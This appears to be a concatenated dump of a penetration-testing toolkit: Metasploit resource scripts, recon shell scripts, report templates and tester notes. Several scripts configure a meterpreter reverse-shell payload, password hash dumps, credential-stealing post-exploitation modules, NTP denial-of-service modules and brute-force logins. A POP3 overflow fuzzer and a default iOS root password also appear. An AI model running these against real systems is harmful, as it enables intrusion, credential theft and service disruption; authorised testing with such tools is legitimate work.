URIPATH / 4 | set PAYLOAD java/meterpreter/reverse_tcp 5 | set LHOST 6 | set LPORT 443 7 | set AutoLoadStdapi false 8 | set AutoVerifySession false 9 | set AutoRunScript post/windows/manage/migrate 10 | exploit 11 | 
-------------------------------------------------------------------------------- /resource/25-smtp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 25 4 | 5 | use auxiliary/scanner/smtp/smtp_version 6 | run 7 | 8 | use auxiliary/scanner/smtp/smtp_enum 9 | run 10 | 11 | use auxiliary/scanner/smtp/smtp_ntlm_domain 12 | run 13 | 14 | use auxiliary/scanner/smtp/smtp_relay 15 | run 16 | -------------------------------------------------------------------------------- /resource/502-scada.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 502 4 | 5 | use auxiliary/scanner/scada/modbusclient 6 | run 7 | 8 | use auxiliary/scanner/scada/modbusdetect 9 | run 10 | 11 | use auxiliary/scanner/scada/modbus_banner_grabbing 12 | run 13 | 14 | use auxiliary/scanner/scada/modbus_findunitid 15 | run 16 | -------------------------------------------------------------------------------- /resource/1433-mssql.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1433 4 | 5 | use scanner/mssql/mssql_ping 6 | run 7 | 8 | use scanner/mssql/mssql_login 9 | set PASS-FILE /usr/share/wordlists/fasttrack.txt 10 | run 11 | 12 | use scanner/mssql/mssql_hashdump 13 | run 14 | 15 | use scanner/mssql/mssql_schemadump 16 | run 17 | -------------------------------------------------------------------------------- /notes/Python/discover/recon/salesforce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | 5 | # variables 6 | colorBlue = "\033[01;34m{0}\033[00m" 7 | 8 | ############################################################################################################## 9 | 10 | os.system("clear") 11 | banner() 12 | 13 | print "Salesforce" 14 | print 
15 | print 16 | sys.exit(0) 17 | -------------------------------------------------------------------------------- /notes/mobile.txt: -------------------------------------------------------------------------------- 1 | Mobile App Testing for iOS 2 | 3 | 4 | iOS 7.1.1 5 | Pangu Jailbreak 1.2.0 6 | http://cydiainstaller.net/download/install-cydia-ios-7-1-to-7-1-2/ 7 | 8 | Cydia 9 | Run updates 10 | Install 11 | OpenSSH 12 | iFile 13 | Apple File Conduit 2 14 | 15 | ssh root@ 16 | password: alpine 17 | 18 | iExplorer $35 19 | www.macroplant.com/iexplorer 20 | -------------------------------------------------------------------------------- /resource/http.rc: -------------------------------------------------------------------------------- 1 | setg DOMAIN 2 | setg HTTPBL_APIKEY 3 | setg PATH_SAVE /root 4 | setg RANGE 5 | setg RHOST 6 | setg RHOSTS 7 | setg SQLMAP_PATH /pentest/database/sqlmap 8 | setg THREADS 255 9 | setg VULNCSV 10 | 11 | ipidseq # from ip 12 | 13 | lotus_domino_hashes # from lotus 14 | lotus_domino_login # from lotus 15 | lotus_domino_version # from lotus 16 | -------------------------------------------------------------------------------- /resource/5432-postgres.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 5432 4 | 5 | use auxiliary/scanner/postgres/postgres_version 6 | run 7 | 8 | use auxiliary/scanner/postgres/postgres_login 9 | run 10 | 11 | use auxiliary/scanner/postgres/postgres_hashdump 12 | run 13 | 14 | use auxiliary/scanner/postgres/postgres_dbname_flag_injection 15 | run 16 | 17 | use auxiliary/scanner/postgres/postgres_schemadump 18 | run 19 | -------------------------------------------------------------------------------- /resource/22-ssh.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 22 4 | 5 | use auxiliary/scanner/ssh/ssh_version 6 | run 7 | 8 | 
use auxiliary/scanner/ssh/detect_kippo 9 | run 10 | 11 | use auxiliary/scanner/ssh/eaton_xpert_backdoor 12 | run 13 | 14 | use auxiliary/scanner/ssh/fortinet_backdoor 15 | run 16 | 17 | use auxiliary/scanner/ssh/juniper_backdoor 18 | run 19 | 20 | use auxiliary/scanner/ssh/libssh_auth_bypass 21 | run 22 | -------------------------------------------------------------------------------- /resource/1521-oracle.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 1521 4 | 5 | use auxiliary/scanner/oracle/tnslsnr_version 6 | run 7 | 8 | use auxiliary/scanner/oracle/oracle_hashdump 9 | run 10 | 11 | use auxiliary/scanner/oracle/oracle_login 12 | run 13 | 14 | use auxiliary/scanner/oracle/sid_brute 15 | run 16 | 17 | use auxiliary/scanner/oracle/sid_enum 18 | run 19 | 20 | use auxiliary/scanner/oracle/tnspoison_checker 21 | run 22 | -------------------------------------------------------------------------------- /report/data/hosts.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Reporting Framework 7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 


--------------------------------------------------------------------------------
/report/data/doc.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/emails.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/names.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/pdf.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/ppt.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/txt.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/waf.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/xls.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/misc/netblocks.sh:
--------------------------------------------------------------------------------
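#!/usr/bin/bash
#
# Netblocks: query whois for every /8 (1.0.0.0 through 255.0.0.0) and write
# the CIDR / OrgName lines of each record to netblocks.txt in the current
# directory.
#
# Output:  netblocks.txt (overwritten on each run).
# Network: one whois query per /8, which takes roughly 100 seconds.

clear
echo
echo "Netblocks"
echo
echo
echo "By Lee Baird"
echo
echo "This returns a list of Class A owners and takes about 100 sec."
echo

# Scratch files live in a private temp dir instead of ./tmp and ./tmp2, so a
# stale ./tmp left by an earlier run cannot leak into the output, and cleanup
# cannot remove unrelated files in the working directory that start with "tmp".
workdir=$(mktemp -d) || exit 1
trap 'rm -rf "$workdir"' EXIT

raw="$workdir/raw"
filtered="$workdir/filtered"

for x in $(seq 1 255); do
     # Keep only the allocation block and the owner name from each record.
     whois "$x.0.0.0" | grep -E '(CIDR|OrgName)' >> "$raw"
     echo >> "$raw"
done

# Drop registry comment lines and "No address" placeholders, then squeeze
# repeated blank lines so owners are separated by a single blank line.
grep -E -v '(%|No address)' "$raw" > "$filtered"
cat -s "$filtered" > netblocks.txt

echo
echo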


--------------------------------------------------------------------------------
/report/data/records.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/squatting.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/subdomains.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/traceroute.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/whatweb.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/whois-ip.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/active-recon.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/passive-recon.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/whois-domain.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/zonetransfer.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/certificates.htm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |     
 5 |     
 6 |     Reporting Framework
 7 |     
 8 |     
 9 |     
10 | 
11 | 
12 | 
13 | 
14 | 
15 | 16 | -------------------------------------------------------------------------------- /resource/6000-5-x11.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | 4 | use auxiliary/scanner/x11/open_x11 5 | set RPORT 6000 6 | run 7 | 8 | use auxiliary/scanner/x11/open_x11 9 | set RPORT 6001 10 | run 11 | 12 | use auxiliary/scanner/x11/open_x11 13 | set RPORT 6002 14 | run 15 | 16 | use auxiliary/scanner/x11/open_x11 17 | set RPORT 6003 18 | run 19 | 20 | use auxiliary/scanner/x11/open_x11 21 | set RPORT 6004 22 | run 23 | 24 | use auxiliary/scanner/x11/open_x11 25 | set RPORT 6005 26 | run 27 | -------------------------------------------------------------------------------- /notes/Python/ex1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | import sys 5 | 6 | os.system("clear") 7 | 8 | port = raw_input("\nEnter a valid port: ") 9 | 10 | if port == "": 11 | print "\nYou did not enter anything.\n\n" 12 | sys.exit(1) 13 | 14 | try: 15 | val = int(port) 16 | except ValueError: 17 | print("\nThat is not an number.\n\n") 18 | sys.exit(1) 19 | 20 | if int(port) not in range(1,65535): 21 | print "\nThat is an invalid port.\n\n" 22 | else: 23 | print "\nThat is a valid port.\n\n" 24 | -------------------------------------------------------------------------------- /resource/post-osx.rc: -------------------------------------------------------------------------------- 1 | run post/osx/gather/apfs_encrypted_volume_passwd 2 | run post/osx/gather/autologin_password 3 | run post/osx/gather/enum_adium 4 | run post/osx/gather/enum_airport 5 | run post/osx/gather/enum_chicken_vnc_profile 6 | run post/osx/gather/enum_colloquy 7 | run post/osx/gather/enum_keychain 8 | run post/osx/gather/enum_messages 9 | run post/osx/gather/enum_osx 10 | run post/osx/gather/hashdump 11 | run post/osx/gather/password_prompt_spoof 12 | run 
post/osx/gather/safari_lastsession 13 | run post/osx/gather/vnc_password_osx 14 | -------------------------------------------------------------------------------- /resource/123-udp-ntp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 123 4 | 5 | use auxiliary/scanner/ntp/ntp_monlist 6 | run 7 | 8 | use auxiliary/scanner/ntp/ntp_nak_to_the_future 9 | run 10 | 11 | use auxiliary/scanner/ntp/ntp_peer_list_dos 12 | run 13 | 14 | use auxiliary/scanner/ntp/ntp_peer_list_sum_dos 15 | run 16 | 17 | use auxiliary/scanner/ntp/ntp_readvar 18 | run 19 | 20 | use auxiliary/scanner/ntp/ntp_req_nonce_dos 21 | run 22 | 23 | use auxiliary/scanner/ntp/ntp_reslist_dos 24 | run 25 | 26 | use auxiliary/scanner/ntp/ntp_unsettrap_dos 27 | run 28 | -------------------------------------------------------------------------------- /resource/21-ftp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 21 4 | 5 | use auxiliary/scanner/ftp/ftp_version 6 | run 7 | 8 | use auxiliary/scanner/ftp/anonymous 9 | run 10 | 11 | use auxiliary/scanner/ftp/bison_ftp_traversal 12 | run 13 | 14 | use auxiliary/scanner/ftp/colorado_ftp_traversal 15 | run 16 | 17 | use auxiliary/scanner/ftp/easy_file_sharing_ftp 18 | run 19 | 20 | use auxiliary/scanner/ftp/konica_ftp_traversal 21 | run 22 | 23 | use auxiliary/scanner/ftp/pcman_ftp_traversal 24 | run 25 | 26 | use auxiliary/scanner/ftp/titanftp_xcrc_traversal 27 | run 28 | -------------------------------------------------------------------------------- /report/data/registered-domains.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Reporting Framework 7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 
15 | Run Domain > Find registered domains.
16 | Paste the results here.
17 | 
18 | 19 | -------------------------------------------------------------------------------- /config/vimrc: -------------------------------------------------------------------------------- 1 | 2 | set number " Show line numbers 3 | syntax on " Syntax highlighting 4 | 5 | set ignorecase " Search is case-insensitive 6 | set hlsearch " Highlight search matches 7 | set incsearch " Highlight first matches of searches while typing 8 | 9 | set expandtab " Insert spaces instead of tabs 10 | set shiftwidth=5 " Tab = 5 spaces 11 | set softtabstop=5 " Tab = 5 spaces 12 | set backspace=indent,eol,start " Modern backspace behavior 13 | 14 | -------------------------------------------------------------------------------- /resource/9100-printers.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 9100 4 | 5 | use auxiliary/scanner/printer/printer_version_info 6 | run 7 | 8 | use auxiliary/scanner/printer/printer_delete_file 9 | run 10 | 11 | use auxiliary/scanner/printer/printer_download_file 12 | run 13 | 14 | use auxiliary/scanner/printer/printer_upload_file 15 | run 16 | 17 | use auxiliary/scanner/printer/printer_env_vars 18 | run 19 | 20 | use auxiliary/scanner/printer/printer_list_dir 21 | run 22 | 23 | use auxiliary/scanner/printer/printer_list_volumes 24 | run 25 | 26 | use auxiliary/scanner/printer/printer_ready_message 27 | run 28 | -------------------------------------------------------------------------------- /resource/recon-ng-active.rc: -------------------------------------------------------------------------------- 1 | modules load recon/domains-hosts/mx_spf_ip 2 | run 3 | modules load recon/netblocks-hosts/reverse_resolve 4 | run 5 | modules load recon/hosts-hosts/resolve 6 | run 7 | modules load recon/hosts-hosts/reverse_resolve 8 | run 9 | 10 | db query UPDATE hosts SET host = LOWER(host) 11 | 12 | db query DELETE FROM hosts WHERE host NOT LIKE '%.yyy%' 13 | 14 | spool start 
/tmp/subdomains-active 15 | db query SELECT DISTINCT host,ip_address FROM hosts WHERE host IS NOT NULL ORDER BY host ASC 16 | db query SELECT DISTINCT host,ip_address FROM ports WHERE host IS NOT NULL ORDER BY host ASC 17 | spool stop 18 | 19 | exit 20 | -------------------------------------------------------------------------------- /misc/rebrand.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | echo 4 | echo -n "Enter the location of your folder: " 5 | read -e location 6 | 7 | # Check for no answer 8 | if [[ -z $location ]]; then 9 | echo 'No answer.' 10 | echo 11 | exit 12 | fi 13 | 14 | # Check for wrong answer 15 | if [ ! $location ]; then 16 | echo 'Wrong location.' 17 | echo 18 | exit 19 | fi 20 | 21 | cd $location 22 | 23 | sed -i 's|href="https://github.com/leebaird/discover"|href="https://www.acme.org"|g' index.htm 24 | cd pages/ 25 | sed -i 's|href="https://github.com/leebaird/discover"|href="https://www.acme.org"|g' *.htm 26 | 27 | firefox ../index.htm & 28 | -------------------------------------------------------------------------------- /misc/dns-transfer.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | echo 5 | echo "DNS Transfer" 6 | echo 7 | echo 8 | echo "By Lee Baird" 9 | echo 10 | echo "Check for DNS zone transfer." 11 | echo 12 | echo "Usage: target.com" 13 | echo 14 | 15 | read -p "Domain: " domain 16 | 17 | if [ -z $domain ]; then 18 | echo 19 | echo "========================================" 20 | echo 21 | echo "Invalid choice." 
22 | echo 23 | echo 24 | exit 25 | fi 26 | 27 | echo 28 | echo "========================================" 29 | echo 30 | 31 | for x in $(host -t ns $domain | cut -d ' ' -f4); do 32 | host -l $domain $x 33 | done 34 | 35 | echo 36 | echo 37 | -------------------------------------------------------------------------------- /misc/ping-sweep.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | echo 5 | echo "PIng Sweep" 6 | echo 7 | echo 8 | echo "By Lee Baird" 9 | echo 10 | echo "Ping sweep a Class C." 11 | echo 12 | echo "Usage: 192.168.1" 13 | echo 14 | 15 | read -p "Class: " class 16 | 17 | if [ -z $class ]; then 18 | echo 19 | echo "========================================" 20 | echo 21 | echo "Invalid choice." 22 | echo 23 | echo 24 | exit 25 | fi 26 | 27 | echo 28 | echo "========================================" 29 | echo 30 | 31 | for x in `seq 1 254`; do 32 | ping -c1 $class.$x | grep 'bytes from' | cut -d ' ' -f4 | cut -d ':' -f1 & 33 | done 34 | 35 | echo 36 | echo 37 | -------------------------------------------------------------------------------- /misc/dns-reverse.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | echo 5 | echo "DNS Reverse" 6 | echo 7 | echo 8 | echo "By Lee Baird" 9 | echo 10 | echo "Perform a PTR DNS query on a Class C range and return FQDNs." 11 | echo 12 | echo "Usage: 192.168.1" 13 | echo 14 | 15 | read -p "Class: " class 16 | 17 | if [ -z $class ]; then 18 | echo 19 | echo "========================================" 20 | echo 21 | echo "Invalid choice." 
22 | echo 23 | echo 24 | exit 25 | fi 26 | 27 | echo 28 | echo "========================================" 29 | echo 30 | 31 | for x in `seq 1 254`; do 32 | host $class.$x | grep 'name pointer' | cut -d ' ' -f1,5 33 | done 34 | 35 | echo 36 | echo 37 | -------------------------------------------------------------------------------- /misc/subdomains-from-ssl.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | echo 5 | echo 6 | echo -n "Enter a domain: " 7 | read domain 8 | 9 | # Check for no answer 10 | if [[ -z $domain ]]; then 11 | echo 12 | echo "[!] You didn't enter a domain." 13 | echo 14 | echo 15 | exit 16 | fi 17 | 18 | sslyze $domain --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers > tmp 19 | 20 | grep 'X509v3 Subject Alternative Name:' tmp | sed 's/ X509v3 Subject Alternative Name: //g' | sed 's/, DNS:/\n/g' | sed 's/www.//g' | sed 's/DNS://g' > tmp2 21 | 22 | # Remove trailing whitespace from each line 23 | sed 's/[ \t]*$//' tmp2 | sort -u > tmp3 24 | 25 | echo 26 | cat tmp3 27 | rm tmp* 28 | echo 29 | echo 30 | -------------------------------------------------------------------------------- /misc/dns-forward.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | echo 5 | echo "DNS Forward" 6 | echo 7 | echo 8 | echo "By Lee Baird" 9 | echo 10 | echo "Show IP addresses of subdomains." 11 | echo 12 | echo "Usage: target.com" 13 | echo 14 | 15 | read -p "Domain: " domain 16 | 17 | if [ -z $domain ]; then 18 | echo 19 | echo "========================================" 20 | echo 21 | echo "Invalid choice." 
22 | echo 23 | echo 24 | exit 25 | fi 26 | 27 | echo 28 | echo "========================================" 29 | echo 30 | 31 | for x in $(cat /usr/share/dnsenum/dns.txt); do 32 | host $x.$domain | grep 'has address' | cut -d ' ' -f1,4 >> tmp 33 | done 34 | 35 | column -t tmp | sort -u 36 | 37 | rm tmp 38 | 39 | echo 40 | echo 41 | -------------------------------------------------------------------------------- /directObjectRef.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | f_banner 5 | 6 | echo -e "${BLUE}Using Burp, authenticate to a site, map & Spider, then log out.${NC}" 7 | echo -e "${BLUE}Target > Site map > select the URL > right click > Copy URLs in${NC}" 8 | echo -e "${BLUE}this host. Paste the results into a new file.${NC}" 9 | 10 | f_location 11 | 12 | for i in $(cat $location); do 13 | curl -sk -w "%{http_code} - %{url_effective} \\n" "$i" -o /dev/null 2>&1 | tee -a tmp 14 | done 15 | 16 | cat tmp | sort -u > DirectObjectRef.txt 17 | mv DirectObjectRef.txt $home/data/DirectObjectRef.txt 18 | rm tmp 19 | 20 | echo 21 | echo $medium 22 | echo 23 | echo "***Scan complete.***" 24 | echo 25 | echo 26 | echo -e "The new report is located at ${YELLOW}$home/data/DirectObjectRef.txt${NC}\n" 27 | -------------------------------------------------------------------------------- /resource/post-linux.rc: -------------------------------------------------------------------------------- 1 | run post/linux/gather/checkcontainer 2 | run post/linux/gather/checkvm 3 | run post/linux/gather/ecryptfs_creds 4 | run post/linux/gather/enum_commands 5 | run post/linux/gather/enum_configs 6 | run post/linux/gather/enum_network 7 | run post/linux/gather/enum_protections 8 | run post/linux/gather/enum_psk 9 | run post/linux/gather/enum_system 10 | run post/linux/gather/enum_users_history 11 | run post/linux/gather/enum_xchat 12 | run post/linux/gather/gnome_commander_creds 13 | run 
post/linux/gather/gnome_keyring_dump 14 | run post/linux/gather/hashdump 15 | run post/linux/gather/mount_cifs_creds 16 | run post/linux/gather/openvpn_credentials 17 | run post/linux/gather/phpmyadmin_credsteal 18 | run post/linux/gather/pptpd_chap_secrets 19 | run post/linux/gather/tor_hiddenservices 20 | -------------------------------------------------------------------------------- /notes/ssl.txt: -------------------------------------------------------------------------------- 1 | SSL 2 | 3 | 4 | Redirect 5 | Examine the response of a 301 message or Javascript. 6 | curl -vvvv http://target.com 7 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 8 | 9 | Renegotiating (NULL-SHA or NULL-MD5) 10 | 11 | sslscan --no-failed 12 | 13 | sslscan --no-failed --targets=443.txt 14 | 15 | openssl s_client -connect target:443 16 | 17 | telnet 443 18 | GET / HTTP/1.0 19 | R 20 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 21 | 22 | cat 443.txt | while read IP port; do echo "----START "$IP":"$port"----"; echo -e "HEAD / HTTP/1.0\nR\n\n" | ncat --ssl "$IP" "$port"; echo -e "\$ 23 | -------------------------------------------------------------------------------- /resource/445-smb.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 445 4 | 5 | use auxiliary/scanner/dcerpc/petitpotam 6 | run 7 | 8 | use auxiliary/scanner/smb/pipe_auditor 9 | run 10 | 11 | use auxiliary/scanner/smb/pipe_dcerpc_auditor 12 | run 13 | 14 | use auxiliary/scanner/smb/psexec_loggedin_users 15 | run 16 | 17 | use auxiliary/scanner/smb/smb_enum_gpp 18 | run 19 | 20 | use auxiliary/scanner/smb/smb_enumshares 21 | run 22 | 23 | use auxiliary/scanner/smb/smb_enumusers 24 | run 25 | 26 | use 
auxiliary/scanner/smb/smb_enumusers_domain 27 | run 28 | 29 | use auxiliary/scanner/smb/smb_login 30 | run 31 | 32 | use auxiliary/scanner/smb/smb_lookupsid 33 | set MaxRID 1025 34 | run 35 | 36 | use auxiliary/scanner/smb/smb_ms17_010 37 | run 38 | 39 | use auxiliary/scanner/smb/smb_uninit_cred 40 | run 41 | 42 | use auxiliary/scanner/smb/smb_version 43 | run 44 | -------------------------------------------------------------------------------- /misc/crawl.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | echo 5 | echo "Crawl" 6 | echo 7 | echo 8 | echo "By Lee Baird" 9 | echo 10 | echo "Find all of the subdomains linked to the homepage." 11 | echo 12 | echo "Usage: target.com" 13 | echo 14 | 15 | read -p "Domain: " domain 16 | 17 | if [ -z $domain ]; then 18 | echo 19 | echo "========================================" 20 | echo 21 | echo "Invalid choice." 22 | echo 23 | echo 24 | exit 25 | fi 26 | 27 | echo 28 | echo "========================================" 29 | echo 30 | 31 | wget -q www.$domain 32 | 33 | if [ ! -e index.html ]; then 34 | echo 35 | exit 36 | fi 37 | 38 | grep 'href=' index.html | cut -d '/' -f3 | grep $domain | egrep -v "(www.$domain|>)" | cut -d '"' -f1 | sort -u > tmp 39 | 40 | if [ ! -s tmp ]; then 41 | echo 'No subdomains found.' 
42 | else 43 | cat tmp | sort -u | column -t 2>/dev/null 44 | fi 45 | 46 | rm index.html tmp* 47 | 48 | echo 49 | echo 50 | -------------------------------------------------------------------------------- /notes/Python/test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | 5 | os.system("clear") 6 | 7 | f = open("tmp","r") # Setup a read connection to file 8 | filedata = f.read() # Read the file 9 | f.close() # Close the connection 10 | filedata = filedata.split("\n") # Turn into a list 11 | 12 | ############################## 13 | 14 | out = [] # Create an empty array 15 | 16 | for i in filedata: 17 | if "@" in i: # grep '@' 18 | if not "apples" in i: # grep -v 'apples' 19 | out.append(i.lower()) # Append to array and change to lower case 20 | 21 | out = list(set(out)) # Make list unique 22 | out.sort() # Sort 23 | 24 | for j in out: 25 | print j 26 | -------------------------------------------------------------------------------- /notes/Python/fuzzer-pop3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | import socket 5 | 6 | os.system("clear") 7 | 8 | # Create an array of buffers from 10 to 2000, with increments of 20. 9 | buffer=["A"] 10 | counter=100 11 | 12 | while len(buffer) <= 30: 13 | buffer.append("A"*counter) 14 | counter=counter+200 15 | 16 | for string in buffer: 17 | print "\n\nFuzzing PASS with %s bytes." % len(string) 18 | 19 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 20 | connect=s.connect(("172.16.181.135",110)) # Connect to IP on port 110. 21 | 22 | s.recv(1024) # Receive reply. 23 | s.send("USER test\r\n") # Send username 'test'. 24 | s.recv(1024) # Receive reply. 25 | s.send("PASS " + string + "\r\n") # Send password 'PASS' plus random buffer. 26 | s.send("QUIT\r\n") # Send command 'QUIT'. 27 | s.close() # Close socket. 
28 | -------------------------------------------------------------------------------- /notes/consulting.txt: -------------------------------------------------------------------------------- 1 | Consulting 2 | 3 | 4 | # Backpack 5 | Update your VMs and tools. 6 | Power strip and extension cord. 7 | 4 port switch. 8 | 25’ CAT6 cable. 9 | (2) 6’ CAT6 cables. 10 | (2) USB C ethernet adapters. 11 | 12 | # Dress 13 | No hats or sunglasses inside. 14 | Shave 15 | Long hair should be slicked back in a ponytail. 16 | Shirt - pressed button up, one button from the top, tucked in. 17 | Pants - pressed, belt, no jeans. 18 | Shoes - shined. 19 | 20 | # Set expectations up front 21 | Number of days. 22 | Start, lunch, and stop times. 23 | Status updates. 24 | Deliverable. 25 | 26 | # Know your environment 27 | Location of bathroom. 28 | People will be watching AND listening. 29 | Leave your area clean. 30 | 31 | # Client 32 | Treat them with respect (yes sir, no ma’am). 33 | Be responsive. 34 | Control the client and the engagement, don’t let them control you. 35 | Beware hovering. 36 | You are not there to teach. 
37 | -------------------------------------------------------------------------------- /notes/snmp.txt: -------------------------------------------------------------------------------- 1 | SNMP 2 | 3 | 4 | # Default or Guessable SNMP Community Strings 5 | 6 | onesixtyone -c -i 161.txt 7 | 8 | snmpcheck -t 9 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 10 | 11 | # Management Information Bases (MIB) Tree 12 | 13 | 1.3.6.1.2.1.25.1.6.0 System processes 14 | 1.3.6.1.2.1.25.4.2.1.2 Running programs 15 | 1.3.6.1.2.1.25.4.2.1.4 Processes path 16 | 1.3.6.1.2.1.25.2.3.1.4 Storage units 17 | 1.3.6.1.2.1.25.6.3.1.2 Software name 18 | 1.3.6.1.4.1.77.1.2.25 Windows user accounts 19 | 1.3.6.1.2.1.6.13.1.3 Windows TCP ports 20 | 21 | # Read-only Community String of 'public' 22 | 23 | snmpwalk -c public -v1 24 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 25 | 26 | # Modify a variable 27 | 28 | snmpset -v -c s "" 